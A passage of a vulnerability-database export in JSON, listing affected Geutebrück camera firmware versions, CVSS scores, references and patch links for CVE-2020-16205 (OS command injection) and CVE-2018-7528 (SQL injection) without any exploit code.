            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam/ebc-2110",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ebc-2111",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2241",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2250",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2230",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2239",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2249",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ewpc-2270",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-code/eec-2400",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-code: eec-2xxx version",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam: ebc-21xx version",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam:efd-22xx version",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam:ethc-22xx version",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam:ewpc-22xx version",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "1.12.0.27"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_efd-2240_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_efd-2241_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebrueck:g-code_eec-2400_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2020-16205",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2020-16205",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-009458",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2021-14829",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2020-16205",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-009458",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-16205",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-009458",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-14829",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202008-267",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Using a specially crafted URL command, a remote authenticated user can execute commands as root on the G-Cam and G-Code (Firmware Versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5). An OS command injection vulnerability exists in G-Cam and G-Code. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Geutebruck GmbH is a German high-tech private company that specializes in designing and producing high-quality, perfectly matched video security solutions. \n\r\n\r\nGeutebruck IP Cameras certification RCE vulnerability",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-16205",
            "trust": 3.0
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-20-219-03",
            "trust": 2.4
          },
          {
            "db": "PACKETSTORM",
            "id": "158888",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2719",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "id": "VAR-202008-0367",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.9440476214285715
      },
      "last_update_date": "2024-11-23T22:33:23.600000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/index.html"
          },
          {
            "title": "Patch for Geutebruck IP Cameras certification RCE vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/251321"
          },
          {
            "title": "Geutebr\u00fcck G-Cam  and G-Code Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=126603"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03"
          },
          {
            "trust": 2.4,
            "url": "http://packetstormsecurity.com/files/158888/geutebruck-testaction.cgi-remote-command-execution.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16205"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16205"
          },
          {
            "trust": 0.6,
            "url": "https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2719/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-08-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "date": "2020-11-06T05:06:27",
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "date": "2020-08-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "date": "2020-08-14T14:15:12.487000",
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-03-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-14829"
          },
          {
            "date": "2020-11-06T05:06:27",
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          },
          {
            "date": "2020-08-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          },
          {
            "date": "2024-11-21T05:06:55.957000",
            "db": "NVD",
            "id": "CVE-2020-16205"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OS command injection vulnerabilities in G-Cam and G-Code",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-009458"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202008-267"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201803-2218

    Vulnerability from variot - Updated: 2024-11-23 21:53

    An SQL injection vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an attacker to alter stored data. The G-Cam/EFD-2250 and Topline TopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following security vulnerabilities: (1) an authentication-bypass vulnerability; (2) a SQL-injection vulnerability; (3) a cross-site request-forgery vulnerability; (4) an access-bypass vulnerability; (5) a security-bypass vulnerability; (6) a cross-site scripting vulnerability. Attackers may exploit these issues to gain unauthorized access to the affected device, to bypass certain security restrictions and perform unauthorized actions, to compromise the application and access or modify data, to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 and Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of the German company Geutebrück.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2218",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7528",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.4,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-7528",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 9.4,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06024",
                "impactScore": 9.2,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "NONE",
                "baseScore": 9.4,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e94500-39ab-11e9-a236-000c29342cb1",
                "impactScore": 9.2,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:N",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 6.4,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-137560",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 9.1,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-7528",
                "impactScore": 5.2,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7528",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7528",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06024",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-762",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "e2e94500-39ab-11e9-a236-000c29342cb1",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137560",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
